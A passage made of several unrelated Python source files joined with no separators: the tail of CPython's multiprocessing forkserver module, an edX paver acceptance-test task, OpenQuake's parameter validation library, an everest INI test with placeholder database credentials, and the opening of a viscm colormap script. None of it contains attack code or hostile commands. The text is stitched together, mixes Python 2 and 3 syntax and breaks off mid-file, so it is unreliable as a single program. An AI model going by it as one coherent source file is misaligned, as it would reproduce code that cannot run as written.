process will just reuse the forkserver started by its parent, so
ensure_running() will do nothing.
'''
with self._lock:
semaphore_tracker.ensure_running()
if self._forkserver_pid is not None:
# forkserver was launched before, is it still running?
pid, status = os.waitpid(self._forkserver_pid, os.WNOHANG)
if not pid:
# still alive
return
# dead, launch it again
os.close(self._forkserver_alive_fd)
self._forkserver_address = None
self._forkserver_alive_fd = None
self._forkserver_pid = None
cmd = ('from multiprocessing.forkserver import main; ' +
'main(%d, %d, %r, **%r)')
if self._preload_modules:
desired_keys = {'main_path', 'sys_path'}
data = spawn.get_preparation_data('ignore')
data = {x: y for x, y in data.items() if x in desired_keys}
else:
data = {}
with socket.socket(socket.AF_UNIX) as listener:
address = connection.arbitrary_address('AF_UNIX')
listener.bind(address)
os.chmod(address, 0o600)
listener.listen()
# all client processes own the write end of the "alive" pipe;
# when they all terminate the read end becomes ready.
alive_r, alive_w = os.pipe()
try:
fds_to_pass = [listener.fileno(), alive_r]
cmd %= (listener.fileno(), alive_r, self._preload_modules,
data)
exe = spawn.get_executable()
args = [exe] + util._args_from_interpreter_flags()
args += ['-c', cmd]
pid = util.spawnv_passfds(exe, args, fds_to_pass)
except:
os.close(alive_w)
raise
finally:
os.close(alive_r)
self._forkserver_address = address
self._forkserver_alive_fd = alive_w
self._forkserver_pid = pid
#
#
#
def main(listener_fd, alive_r, preload, main_path=None, sys_path=None):
'''Run forkserver.'''
if preload:
if '__main__' in preload and main_path is not None:
process.current_process()._inheriting = True
try:
spawn.import_main_path(main_path)
finally:
del process.current_process()._inheriting
for modname in preload:
try:
__import__(modname)
except ImportError:
pass
util._close_stdin()
sig_r, sig_w = os.pipe()
os.set_blocking(sig_r, False)
os.set_blocking(sig_w, False)
def sigchld_handler(*_unused):
# Dummy signal handler, doesn't do anything
pass
handlers = {
# unblocking SIGCHLD allows the wakeup fd to notify our event loop
signal.SIGCHLD: sigchld_handler,
# protect the process from ^C
signal.SIGINT: signal.SIG_IGN,
}
old_handlers = {sig: signal.signal(sig, val)
for (sig, val) in handlers.items()}
# calling os.write() in the Python signal handler is racy
signal.set_wakeup_fd(sig_w)
# map child pids to client fds
pid_to_fd = {}
with socket.socket(socket.AF_UNIX, fileno=listener_fd) as listener, \
selectors.DefaultSelector() as selector:
_forkserver._forkserver_address = listener.getsockname()
selector.register(listener, selectors.EVENT_READ)
selector.register(alive_r, selectors.EVENT_READ)
selector.register(sig_r, selectors.EVENT_READ)
while True:
try:
while True:
rfds = [key.fileobj for (key, events) in selector.select()]
if rfds:
break
if alive_r in rfds:
# EOF because no more client processes left
assert os.read(alive_r, 1) == b'', "Not at EOF?"
raise SystemExit
if sig_r in rfds:
# Got SIGCHLD
os.read(sig_r, 65536) # exhaust
while True:
# Scan for child processes
try:
pid, sts = os.waitpid(-1, os.WNOHANG)
except ChildProcessError:
break
if pid == 0:
break
child_w = pid_to_fd.pop(pid, None)
if child_w is not None:
if os.WIFSIGNALED(sts):
returncode = -os.WTERMSIG(sts)
else:
if not os.WIFEXITED(sts):
raise AssertionError(
"Child {0:n} status is {1:n}".format(
pid,sts))
returncode = os.WEXITSTATUS(sts)
# Send exit code to client process
try:
write_signed(child_w, returncode)
except BrokenPipeError:
# client vanished
pass
os.close(child_w)
else:
# This shouldn't happen really
warnings.warn('forkserver: waitpid returned '
'unexpected pid %d' % pid)
if listener in rfds:
# Incoming fork request
with listener.accept()[0] as s:
# Receive fds from client
fds = reduction.recvfds(s, MAXFDS_TO_SEND + 1)
if len(fds) > MAXFDS_TO_SEND:
raise RuntimeError(
"Too many ({0:n}) fds to send".format(
len(fds)))
child_r, child_w, *fds = fds
s.close()
pid = os.fork()
if pid == 0:
# Child
code = 1
try:
listener.close()
selector.close()
unused_fds = [alive_r, child_w, sig_r, sig_w]
unused_fds.extend(pid_to_fd.values())
code = _serve_one(child_r, fds,
unused_fds,
old_handlers)
except Exception:
sys.excepthook(*sys.exc_info())
sys.stderr.flush()
finally:
os._exit(code)
else:
# Send pid to client process
try:
write_signed(child_w, pid)
except BrokenPipeError:
# client vanished
pass
pid_to_fd[pid] = child_w
os.close(child_r)
for fd in fds:
os.close(fd)
except OSError as e:
if e.errno != errno.ECONNABORTED:
raise
def _serve_one(child_r, fds, unused_fds, handlers):
# close unnecessary stuff and reset signal handlers
signal.set_wakeup_fd(-1)
for sig, val in handlers.items():
signal.signal(sig, val)
for fd in unused_fds:
os.close(fd)
(_forkserver._forkserver_alive_fd,
semaphore_tracker._semaphore_tracker._fd,
*_forkserver._inherited_fds) = fds
# Run process object received over pipe
code = spawn._main(child_r)
return code
#
# Read and write signed numbers
#
def read_signed(fd):
data = b''
length = SIGNED_STRUCT.size
while len(data) < length:
s = os.read(fd, length - len(data))
if not s:
raise EOFError('unexpected EOF')
data += s
return SIGNED_STRUCT.unpack(data)[0]
def write_signed(fd, n):
msg = SIGNED_STRUCT.pack(n)
while msg:
nbytes = os.write(fd, msg)
if nbytes == 0:
raise RuntimeError('should not get here')
msg = msg[nbytes:]
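# Illustrative round-trip (not part of the original module): the two helpers
# exchange one signed 64-bit integer over a pipe:
#
#   r, w = os.pipe()
#   write_signed(w, -42)
#   read_signed(r)   # -> -42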
#
#
#
_forkserver = ForkServer()
ensure_running = _forkserver.ensure_running
get_inherited_fds = _forkserver.get_inherited_fds
connect_to_new_process = _forkserver.connect_to_new_process
set_forkserver_preload = _forkserver.set_forkserver_preload
"""
Acceptance test tasks
"""
from paver.easy import cmdopts, needs
from pavelib.utils.test.suites import AcceptanceTestSuite
from pavelib.utils.passthrough_opts import PassthroughTask
from optparse import make_option
try:
from pygments.console import colorize
except ImportError:
colorize = lambda color, text: text
__test__ = False # do not collect
@needs(
'pavelib.prereqs.install_prereqs',
'pavelib.utils.test.utils.clean_reports_dir',
)
@cmdopts([
("system=", "s", "System to act on"),
("default-store=", "m", "Default modulestore to use for course creation"),
("fasttest", "a", "Run without collectstatic"),
make_option("--verbose", action="store_const", const=2, dest="verbosity"),
make_option("-q", "--quiet", action="store_const", const=0, dest="verbosity"),
make_option("-v", "--verbosity", action="count", dest="verbosity"),
("default_store=", None, "deprecated in favor of default-store"),
('extra_args=', 'e', 'deprecated, pass extra options directly in the paver commandline'),
])
@PassthroughTask
def test_acceptance(options, passthrough_options):
"""
Run the acceptance tests for either lms or cms
"""
opts = {
'fasttest': getattr(options, 'fasttest', False),
'system': getattr(options, 'system', None),
'default_store': getattr(options, 'default_store', None),
'verbosity': getattr(options, 'verbosity', 3),
'extra_args': getattr(options, 'extra_args', ''),
'pdb': getattr(options, 'pdb', False),
'passthrough_options': passthrough_options,
}
if opts['system'] not in ['cms', 'lms']:
msg = colorize(
'red',
'No system specified, running tests for both cms and lms.'
)
print msg
if opts['default_store'] not in ['draft', 'split']:
msg = colorize(
'red',
'No modulestore specified, running tests for both draft and split.'
)
print msg
suite = AcceptanceTestSuite('{} acceptance'.format(opts['system']), **opts)
suite.run()
# -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2013-2015, GEM Foundation
# OpenQuake is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# OpenQuake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>.
"""
Validation library for the engine, the desktop tools, and anything else
"""
import re
import ast
import logging
import textwrap
import collections
from decimal import Decimal
import numpy
from openquake.baselib.python3compat import with_metaclass
from openquake.hazardlib import imt, scalerel, gsim
from openquake.baselib.general import distinct
SCALEREL = scalerel.get_available_magnitude_scalerel()
GSIM = gsim.get_available_gsims()
# more tests are in tests/valid_test.py
def gsim(value, **kwargs):
"""
Make sure the given value is the name of an available GSIM class.
>>> gsim('BooreAtkinson2011')
'BooreAtkinson2011()'
"""
try:
gsim_class = GSIM[value]
except KeyError:
raise ValueError('Unknown GSIM: %s' % value)
try:
return gsim_class(**kwargs)
except TypeError:
raise ValueError('Could not instantiate %s%s' % (value, kwargs))
def compose(*validators):
"""
Implement composition of validators. For instance
>>> utf8_not_empty = compose(utf8, not_empty)
"""
def composed_validator(value):
out = value
for validator in reversed(validators):
out = validator(out)
return out
composed_validator.__name__ = 'compose(%s)' % ','.join(
val.__name__ for val in validators)
return composed_validator
class NoneOr(object):
"""
Accept the empty string (casted to None) or something else validated
by the underlying `cast` validator.
"""
def __init__(self, cast):
self.cast = cast
self.__name__ = cast.__name__
def __call__(self, value):
if value:
return self.cast(value)
class Choice(object):
"""
Check if the choice is valid (case sensitive).
"""
@property
def __name__(self):
return 'Choice%s' % str(self.choices)
def __init__(self, *choices):
self.choices = choices
def __call__(self, value):
if value not in self.choices:
raise ValueError('Got %r, expected %s' % (
value, '|'.join(self.choices)))
return value
class ChoiceCI(object):
"""
Check if the choice is valid (case insensitive version).
"""
def __init__(self, *choices):
self.choices = choices
self.__name__ = 'ChoiceCI%s' % str(choices)
def __call__(self, value):
value = value.lower()
if value not in self.choices:
raise ValueError('%r is not a valid choice in %s' % (
value, self.choices))
return value
category = ChoiceCI('population', 'buildings')
class Choices(Choice):
"""
Convert the choices, passed as a comma separated string, into a tuple
of validated strings. For instance
>>> Choices('xml', 'csv')('xml,csv')
('xml', 'csv')
"""
def __call__(self, value):
values = value.lower().split(',')
for val in values:
if val not in self.choices:
raise ValueError('%r is not a valid choice in %s' % (
val, self.choices))
return tuple(values)
export_formats = Choices('', 'xml', 'csv', 'geojson')
class Regex(object):
"""
Compare the value with the given regex
"""
def __init__(self, regex):
self.rx = re.compile(regex)
self.__name__ = 'Regex[%s]' % regex
def __call__(self, value):
if self.rx.match(value) is None:
raise ValueError('%r does not match the regex %r' %
(value, self.rx.pattern))
return value
name = Regex(r'^[a-zA-Z_]\w*$')
name_with_dashes = Regex(r'^[a-zA-Z_][\w\-]*$')
MAX_ID_LENGTH = 100
def simple_id(value):
"""
Check the source id; the only accepted chars are `a-zA-Z0-9_-`
"""
if len(value) > MAX_ID_LENGTH:
raise ValueError('The ID %r is longer than %d character' %
(value, MAX_ID_LENGTH))
if re.match(r'^[\w_\-]+$', value):
return value
raise ValueError(
'Invalid ID %r: the only accepted chars are a-zA-Z0-9_-' % value)
class FloatRange(object):
def __init__(self, minrange, maxrange):
self.minrange = minrange
self.maxrange = maxrange
self.__name__ = 'FloatRange[%s:%s]' % (minrange, maxrange)
def __call__(self, value):
f = float_(value)
if f > self.maxrange:
raise ValueError('%r is bigger than the max, %r' %
(f, self.maxrange))
if f < self.minrange:
raise ValueError('%r is smaller than the min, %r' %
(f, self.minrange))
return f
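# Illustrative behaviour (not part of the original module): a FloatRange
# instance casts the string and enforces the bounds, e.g.
#
#   dip = FloatRange(0, 90)
#   dip('45.5')   # -> 45.5
#   dip('91')     # -> ValueError: 91.0 is bigger than the max, 90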
def not_empty(value):
"""Check that the string is not empty"""
if value == '':
raise ValueError('Got an empty string')
return value
def utf8(value):
r"""
    Check that the string is UTF-8. Returns the decoded text string.
>>> utf8(b'\xe0') # doctest: +ELLIPSIS
Traceback (most recent call last):
...
ValueError: Not UTF-8: ...
"""
try:
if isinstance(value, bytes):
return value.decode('utf-8')
else:
return value
except:
raise ValueError('Not UTF-8: %r' % value)
def utf8_not_empty(value):
"""Check that the string is UTF-8 and not empty"""
return utf8(not_empty(value))
def namelist(value):
"""
:param value: input string
:returns: list of identifiers separated by whitespace or commas
>>> namelist('a,b')
['a', 'b']
>>> namelist('a1 b_2\t_c')
['a1', 'b_2', '_c']
>>> namelist('a1 b_2 1c')
Traceback (most recent call last):
...
ValueError: List of names containing an invalid name: 1c
"""
names = value.replace(',', ' ').split()
for n in names:
try:
name(n)
except ValueError:
raise ValueError('List of names containing an invalid name:'
' %s' % n)
return names
def float_(value):
"""
:param value: input string
:returns: a floating point number
"""
try:
return float(value)
except:
raise ValueError('%r is not a float' % value)
def nonzero(value):
"""
:param value: input string
:returns: the value unchanged
>>> nonzero('1')
'1'
>>> nonzero('0')
Traceback (most recent call last):
...
ValueError: '0' is zero
"""
if float_(value) == 0:
raise ValueError('%r is zero' % value)
return value
def longitude(value):
"""
:param value: input string
:returns: longitude float, rounded to 5 digits, i.e. 1 meter maximum
>>> longitude('0.123456')
0.12346
"""
lon = round(float_(value), 5)
if lon > 180.:
raise ValueError('longitude %s > 180' % lon)
elif lon < -180.:
raise ValueError('longitude %s < -180' % lon)
return lon
def latitude(value):
"""
:param value: input string
:returns: latitude float, rounded to 5 digits, i.e. 1 meter maximum
>>> latitude('-0.123456')
-0.12346
"""
lat = round(float_(value), 5)
if lat > 90.:
raise ValueError('latitude %s > 90' % lat)
elif lat < -90.:
raise ValueError('latitude %s < -90' % lat)
return lat
def depth(value):
"""
:param value: input string
:returns: float >= 0
"""
dep = float_(value)
if dep < 0:
raise ValueError('depth %s < 0' % dep)
return dep
def lon_lat(value):
"""
:param value: a pair of coordinates
:returns: a tuple (longitude, latitude)
>>> lon_lat('12 14')
(12.0, 14.0)
"""
lon, lat = value.split()
return longitude(lon), latitude(lat)
def lon_lat_iml(value, lon, lat, iml):
"""
Used to convert nodes of the form <node lon="LON" lat="LAT" iml="IML" />
"""
return longitude(lon), latitude(lat), positivefloat(iml)
def coordinates(value):
"""
Convert a non-empty string into a list of lon-lat coordinates
>>> coordinates('')
Traceback (most recent call last):
...
ValueError: Empty list of coordinates: ''
>>> coordinates('1.1 1.2')
[(1.1, 1.2)]
>>> coordinates('1.1 1.2, 2.2 2.3')
[(1.1, 1.2), (2.2, 2.3)]
"""
if not value.strip():
raise ValueError('Empty list of coordinates: %r' % value)
return list(map(lon_lat, value.split(',')))
def wkt_polygon(value):
"""
Convert a string with a comma separated list of coordinates into
a WKT polygon, by closing the ring.
"""
points = ['%s %s' % lon_lat for lon_lat in coordinates(value)]
# close the linear polygon ring by appending the first coord to the end
points.append(points[0])
return 'POLYGON((%s))' % ', '.join(points)
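# Illustrative behaviour (not part of the original module): the ring is closed
# by repeating the first coordinate, e.g.
#
#   wkt_polygon('1 2, 3 4, 5 6')
#   # -> 'POLYGON((1.0 2.0, 3.0 4.0, 5.0 6.0, 1.0 2.0))'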
def positiveint(value):
"""
:param value: input string
:returns: positive integer
"""
i = int(not_empty(value))
if i < 0:
raise ValueError('integer %d < 0' % i)
return i
def positivefloat(value):
"""
:param value: input string
:returns: positive float
"""
f = float(not_empty(value))
if f < 0:
raise ValueError('float %s < 0' % f)
return f
def positivefloats(value):
"""
:param value: string of whitespace separated floats
:returns: a list of positive floats
"""
return list(map(positivefloat, value.split()))
_BOOL_DICT = {
'': False,
'0': False,
'1': True,
'false': False,
'true': True,
}
def boolean(value):
"""
:param value: input string such as '0', '1', 'true', 'false'
:returns: boolean
>>> boolean('')
False
>>> boolean('True')
True
>>> boolean('false')
False
>>> boolean('t')
Traceback (most recent call last):
...
ValueError: Not a boolean: t
"""
value = value.strip().lower()
try:
return _BOOL_DICT[value]
except KeyError:
raise ValueError('Not a boolean: %s' % value)
range01 = FloatRange(0, 1)
probability = FloatRange(0, 1)
probability.__name__ = 'probability'
def probabilities(value):
"""
:param value: input string, comma separated or space separated
:returns: a list of probabilities
>>> probabilities('')
[]
>>> probabilities('1')
[1.0]
>>> probabilities('0.1 0.2')
[0.1, 0.2]
>>> probabilities('0.1, 0.2') # commas are ignored
[0.1, 0.2]
"""
return list(map(probability, value.replace(',', ' ').split()))
def decreasing_probabilities(value):
"""
:param value: input string, comma separated or space separated
:returns: a list of decreasing probabilities
>>> decreasing_probabilities('1')
Traceback (most recent call last):
...
ValueError: Not enough probabilities, found '1'
>>> decreasing_probabilities('0.2 0.1')
[0.2, 0.1]
>>> decreasing_probabilities('0.1 0.2')
Traceback (most recent call last):
...
ValueError: The probabilities 0.1 0.2 are not in decreasing order
"""
probs = probabilities(value)
if len(probs) < 2:
raise ValueError('Not enough probabilities, found %r' % value)
elif sorted(probs, reverse=True) != probs:
raise ValueError('The probabilities %s are not in decreasing order'
% value)
return probs
def IML(value, IMT, minIML=None, maxIML=None, imlUnit=None):
"""
Convert a node of the form
<IML IMT="PGA" imlUnit="g" minIML="0.02" maxIML="1.5"/>
into ("PGA", None, 0.02, 1.5) and a node
<IML IMT="MMI" imlUnit="g">7 8 9 10 11</IML>
into ("MMI", [7., 8., 9., 10., 11.], None, None)
"""
imt_str = str(imt.from_string(IMT))
if value:
imls = positivefloats(value)
check_levels(imls, imt_str)
else:
imls = None
min_iml = positivefloat(minIML) if minIML else None
max_iml = positivefloat(maxIML) if maxIML else None
return (imt_str, imls, min_iml, max_iml, imlUnit)
def fragilityparams(value, mean, stddev):
"""
Convert a node of the form <params mean="0.30" stddev="0.16" /> into
a pair (0.30, 0.16)
"""
return positivefloat(mean), positivefloat(stddev)
def intensity_measure_types(value):
"""
:param value: input string
:returns: non-empty list of Intensity Measure Type objects
>>> intensity_measure_types('PGA')
['PGA']
>>> intensity_measure_types('PGA, SA(1.00)')
['PGA', 'SA(1.0)']
>>> intensity_measure_types('SA(0.1), SA(0.10)')
Traceback (most recent call last):
...
ValueError: Duplicated IMTs in SA(0.1), SA(0.10)
"""
imts = []
for chunk in value.split(','):
imts.append(str(imt.from_string(chunk.strip())))
if len(distinct(imts)) < len(imts):
raise ValueError('Duplicated IMTs in %s' % value)
return imts
def check_levels(imls, imt):
"""
Raise a ValueError if the given levels are invalid.
    :param imls: a list of intensity measure levels
:param imt: the intensity measure type
>>> check_levels([0.1, 0.2], 'PGA') # ok
>>> check_levels([0.1], 'PGA')
Traceback (most recent call last):
...
ValueError: Not enough imls for PGA: [0.1]
>>> check_levels([0.2, 0.1], 'PGA')
Traceback (most recent call last):
...
ValueError: The imls for PGA are not sorted: [0.2, 0.1]
>>> check_levels([0.2, 0.2], 'PGA')
Traceback (most recent call last):
...
ValueError: Found duplicated levels for PGA: [0.2, 0.2]
"""
if len(imls) < 2:
raise ValueError('Not enough imls for %s: %s' % (imt, imls))
elif imls != sorted(imls):
raise ValueError('The imls for %s are not sorted: %s' % (imt, imls))
elif len(distinct(imls)) < len(imls):
raise ValueError("Found duplicated levels for %s: %s" % (imt, imls))
def intensity_measure_types_and_levels(value):
"""
:param value: input string
:returns: Intensity Measure Type and Levels dictionary
>>> intensity_measure_types_and_levels('{"SA(0.10)": [0.1, 0.2]}')
{'SA(0.1)': [0.1, 0.2]}
"""
dic = dictionary(value)
    for imt_str, imls in list(dic.items()):  # copy: dic is modified in the loop
norm_imt = str(imt.from_string(imt_str))
if norm_imt != imt_str:
dic[norm_imt] = imls
del dic[imt_str]
check_levels(imls, imt_str) # ValueError if the levels are invalid
return dic
def loss_ratios(value):
"""
:param value: input string
:returns: dictionary loss_type -> loss ratios
>>> loss_ratios('{"structural": [0.1, 0.2]}')
{'structural': [0.1, 0.2]}
"""
dic = dictionary(value)
for lt, ratios in dic.items():
for ratio in ratios:
if not 0 <= ratio <= 1:
raise ValueError('Loss ratio %f for loss_type %s is not in '
'the range [0, 1]' % (ratio, lt))
check_levels(ratios, lt) # ValueError if the levels are invalid
return dic
def dictionary(value):
"""
:param value:
input string corresponding to a literal Python object
:returns:
the Python object
>>> dictionary('')
{}
>>> dictionary('{}')
{}
>>> dictionary('{"a": 1}')
{'a': 1}
>>> dictionary('"vs30_clustering: true"') # an error really done by a user
Traceback (most recent call last):
...
ValueError: '"vs30_clustering: true"' is not a valid Python dictionary
"""
if not value:
return {}
try:
dic = dict(ast.literal_eval(value))
except:
raise ValueError('%r is not a valid Python dictionary' % value)
return dic
# ########################### SOURCES/RUPTURES ############################# #
def mag_scale_rel(value):
"""
:param value:
name of a Magnitude-Scale relationship in hazardlib
:returns:
the corresponding hazardlib object
"""
value = value.strip()
if value not in SCALEREL:
raise ValueError('%r is not a recognized magnitude-scale '
'relationship' % value)
return value
def pmf(value):
"""
    Convert a string into a Probability Mass Function.
:param value:
a sequence of probabilities summing up to 1 (no commas)
:returns:
a list of pairs [(probability, index), ...] with index starting from 0
>>> pmf("0.157 0.843")
[(0.157, 0), (0.843, 1)]
"""
probs = probabilities(value)
if sum(map(Decimal, value.split())) != 1:
raise ValueError('The probabilities %s do not sum up to 1!' % value)
return [(p, i) for i, p in enumerate(probs)]
def check_weights(nodes_with_a_weight):
"""
Ensure that the sum of the values is 1
:param nodes_with_a_weight: a list of Node objects with a weight attribute
"""
weights = [n['weight'] for n in nodes_with_a_weight]
if abs(sum(weights) - 1.) > 1E-12:
raise ValueError('The weights do not sum up to 1!', weights)
return nodes_with_a_weight
def hypo_list(nodes):
"""
:param nodes: a hypoList node with N hypocenter nodes
:returns: a numpy array of shape (N, 3) with strike, dip and weight
"""
check_weights(nodes)
data = []
for node in nodes:
data.append([node['alongStrike'], node['downDip'], node['weight']])
return numpy.array(data, float)
def slip_list(nodes):
"""
:param nodes: a slipList node with N slip nodes
:returns: a numpy array of shape (N, 2) with slip angle and weight
"""
check_weights(nodes)
data = []
for node in nodes:
data.append([slip_range(~node), node['weight']])
return numpy.array(data, float)
def posList(value):
"""
:param value:
a string with the form `lon1 lat1 [depth1] ... lonN latN [depthN]`
without commas, where the depts are optional.
:returns:
a list of floats without other validations
"""
values = value.split()
num_values = len(values)
if num_values % 3 and num_values % 2:
        raise ValueError('Wrong number of values: neither pairs nor triplets: %s' % values)
try:
return list(map(float_, values))
except Exception as exc:
raise ValueError('Found a non-float in %s: %s' % (value, exc))
def point2d(value, lon, lat):
"""
This is used to convert nodes of the form
<location lon="LON" lat="LAT" />
:param value: None
:param lon: longitude string
:param lat: latitude string
:returns: a validated pair (lon, lat)
"""
return longitude(lon), latitude(lat)
def point3d(value, lon, lat, depth):
"""
This is used to convert nodes of the form
<hypocenter lon="LON" lat="LAT" depth="DEPTH"/>
:param value: None
:param lon: longitude string
:param lat: latitude string
:returns: a validated triple (lon, lat, depth)
"""
return longitude(lon), latitude(lat), positivefloat(depth)
def probability_depth(value, probability, depth):
"""
This is used to convert nodes of the form
<hypoDepth probability="PROB" depth="DEPTH" />
:param value: None
:param probability: a probability
:param depth: a depth
:returns: a validated pair (probability, depth)
"""
return (range01(probability), positivefloat(depth))
strike_range = FloatRange(0, 360)
slip_range = strike_range
dip_range = FloatRange(0, 90)
rake_range = FloatRange(-180, 180)
def nodal_plane(value, probability, strike, dip, rake):
"""
This is used to convert nodes of the form
<nodalPlane probability="0.3" strike="0.0" dip="90.0" rake="0.0" />
:param value: None
:param probability: a probability
:param strike: strike angle
:param dip: dip angle
:param rake: rake angle
:returns: a validated tuple (probability, strike, dip, rake)
"""
return (range01(probability), strike_range(strike),
dip_range(dip), rake_range(rake))
def ab_values(value):
"""
a and b values of the GR magnitude-scaling relation.
a is a positive float, b is just a float.
"""
a, b = value.split()
return positivefloat(a), float_(b)
# ############################## site model ################################ #
vs30_type = ChoiceCI('measured', 'inferred')
SiteParam = collections.namedtuple(
'SiteParam', 'z1pt0 z2pt5 measured vs30 lon lat backarc'.split())
def site_param(z1pt0, z2pt5, vs30Type, vs30, lon, lat, backarc="false"):
"""
Used to convert a node like
<site lon="24.7125" lat="42.779167" vs30="462" vs30Type="inferred"
z1pt0="100" z2pt5="5" backarc="False"/>
into a 7-tuple (z1pt0, z2pt5, measured, vs30, lon, lat, backarc)
"""
return SiteParam(positivefloat(z1pt0), positivefloat(z2pt5),
vs30_type(vs30Type) == 'measured',
positivefloat(vs30), longitude(lon),
latitude(lat), boolean(backarc))
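# Illustrative sketch (added example): feeding the string attributes of a
# <site .../> node through site_param; 'measured' is False here because
# vs30Type is 'inferred' (relies on the validators defined earlier in this
# module):
#     _sp = site_param(z1pt0="100", z2pt5="5", vs30Type="inferred",
#                      vs30="462", lon="24.7125", lat="42.779167")
#     assert _sp.measured is False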
###########################################################################
class Param(object):
"""
A descriptor for validated parameters with a default, to be
used as attributes in ParamSet objects.
:param validator: the validator
:param default: the default value
"""
NODEFAULT = object()
def __init__(self, validator, default=NODEFAULT, name=None):
if not callable(validator):
raise ValueError(
'%r for %s is not a validator: it is not callable'
% (validator, name))
if not hasattr(validator, '__name__'):
raise ValueError(
'%r for %s is not a validator: it has no __name__'
% (validator, name))
self.validator = validator
self.default = default
self.name = name # set by ParamSet.__metaclass__
def __get__(self, obj, objclass):
if obj is not None:
if self.default is self.NODEFAULT:
raise AttributeError(self.name)
return self.default
return self
class MetaParamSet(type):
"""
Set the `.name` attribute of every Param instance defined inside
any subclass of ParamSet.
"""
def __init__(cls, name, bases, dic):
for name, val in dic.items():
if isinstance(val, Param):
val.name = name
# used in commonlib.oqvalidation
class ParamSet(with_metaclass(MetaParamSet)):
"""
A set of valid interrelated parameters. Here is an example
of usage:
>>> class MyParams(ParamSet):
... a = Param(positiveint)
... b = Param(positivefloat)
...
... def is_valid_not_too_big(self):
... "The sum of a and b must be under 10. "
... return self.a + self.b < 10
>>> mp = MyParams(a='1', b='7.2')
>>> mp
<MyParams a=1, b=7.2>
>>> MyParams(a='1', b='9.2').validate()
Traceback (most recent call last):
...
ValueError: The sum of a and b must be under 10.
Got:
a=1
b=9.2
The constraints are applied in lexicographic order. The attribute
corresponding to a Param descriptor can be set as usual:
>>> mp.a = '2'
>>> mp.a
'2'
A list with the literal strings can be extracted as follows:
>>> mp.to_params()
[('a', "'2'"), ('b', '7.2')]
It is possible to build a new object from a dictionary of parameters
which are assumed to be already validated:
>>> MyParams.from_(dict(a="'2'", b='7.2'))
<MyParams a='2', b=7.2>
"""
params = {}
@classmethod
def from_(cls, dic):
"""
Build a new ParamSet from a dictionary of string-valued parameters
which are assumed to be already valid.
"""
self = cls.__new__(cls)
for k, v in dic.items():
setattr(self, k, ast.literal_eval(v))
return self
def to_params(self):
"""
Convert the instance dictionary into a sorted list of pairs
(name, valrepr) where valrepr is the string representation of
the underlying value.
"""
dic = self.__dict__
return [(k, repr(dic[k])) for k in sorted(dic)]
def __init__(self, **names_vals):
for name, val in names_vals.items():
if name.startswith(('_', 'is_valid_')):
raise NameError('The parameter name %s is not acceptable'
% name)
try:
convert = getattr(self.__class__, name).validator
except AttributeError:
logging.warning('The parameter %r is unknown, ignoring' % name)
continue
try:
value = convert(val)
except Exception as exc:
raise ValueError('%s: could not convert to %s: %s=%s'
% (exc, convert.__name__, name, val))
setattr(self, name, value)
def validate(self):
"""
Apply the `is_valid` methods to self and possibly raise a ValueError.
"""
# it is important to have the validator applied in a fixed order
valids = [getattr(self, valid)
for valid in sorted(dir(self.__class__))
if valid.startswith('is_valid_')]
for is_valid in valids:
if not is_valid():
dump = '\n'.join('%s=%s' % (n, v)
for n, v in sorted(self.__dict__.items()))
docstring = is_valid.__doc__.strip()
doc = textwrap.fill(docstring.format(**vars(self)))
raise ValueError(doc + '\nGot:\n' + dump)
def __iter__(self):
for item in sorted(vars(self).items()):
yield item
def __repr__(self):
names = sorted(n for n in vars(self) if not n.startswith('_'))
nameval = ', '.join('%s=%r' % (n, getattr(self, n)) for n in names)
return '<%s %s>' % (self.__class__.__name__, nameval)
"""
This file is part of the everest project.
See LICENSE.txt for licensing, CONTRIBUTORS.txt for contributor information.
Created on Nov 21, 2011.
"""
from everest.testing import EverestIni
from everest.testing import Pep8CompliantTestCase
from shutil import rmtree
from tempfile import mkdtemp
from tempfile import mktemp
from everest.compat import open_text
__docformat__ = 'reStructuredText en'
__all__ = []
INI = """\
[DEFAULT]
db_server = my_db_server
db_port = 5432
db_user = my_db_user
db_password = pwd123
db_name = my_db_name
[app:mysimple_app]
db_string = postgresql://%(db_user)s:%(db_password)s@%(db_server)s:%(db_port)s/%(db_name)s
db_echo = false
"""
class TestingTestCase(Pep8CompliantTestCase):
ini_section_name = 'app:mysimple_app'
def set_up(self):
self.__testdir = mkdtemp()
fn = mktemp(suffix="ini", dir=self.__testdir)
ini_file = open_text(fn)
ini_file.write(INI)
ini_file.close()
self.ini_file_path = fn
def tear_down(self):
rmtree(self.__testdir)
def test_ini_file_read(self):
ini = EverestIni(self.ini_file_path)
ini_marker = self.ini_section_name
db_string = ini.get_setting(ini_marker, 'db_string')
self.assert_equal(
db_string,
'postgresql://my_db_user:pwd123@my_db_server:5432/my_db_name')
# This file is part of viscm
# Copyright (C) 2015 Nathaniel Smith <[email protected]>
# Copyright (C) 2015 Stefan van der Walt <[email protected]>
# See file LICENSE.txt for license information.
# Simple script using CIECAM02 and CAM02-UCS to visualize properties of a
# matplotlib colormap
import sys
import os.path
import numpy as np
import matplotlib.pyplot as plt
import mpl_toolkits.mplot3d
from matplotlib.gridspec import GridSpec
from matplotlib.widgets import Button, Slider
import matplotlib.colors
from matplotlib.colors import LinearSegmentedColormap
from colorspacious import cspace_converter
from .minimvc import Trigger
# Our preferred space (mostly here so we can easily tweak it when curious)
UNIFORM_SPACE = "CAM02-UCS"
GREYSCALE_CONVERSION_SPACE = "JCh"
_sRGB1_to_JCh = cspace_converter("sRGB1", GREYSCALE_CONVERSION_SPACE)
_JCh_to_sRGB1 = cspace_converter(GREYSCALE_CONVERSION_SPACE, "sRGB1")
def to_greyscale(sRGB1):
JCh = _sRGB1_to_JCh(sRGB1)
JCh[..., 1] = 0
return _JCh_to_sRGB1(JCh)
_sRGB1_to_uniform = cspace_converter("sRGB1", UNIFORM_SPACE)
_uniform_to_sRGB1 = cspace_converter(UNIFORM_SPACE, "sRGB1")
_deuter50_space = {"name": "sRGB1+CVD",
"cvd_type": "deuteranomaly",
"severity": 50}
_deuter50_to_sRGB1 = cspace_converter(_deuter50_space, "sRGB1")
_deuter100_space = {"name": "sRGB1+CVD",
"cvd_type": "deuteranomaly",
"severity": 100}
_deuter100_to_sRGB1 = cspace_converter(_deuter100_space, "sRGB1")
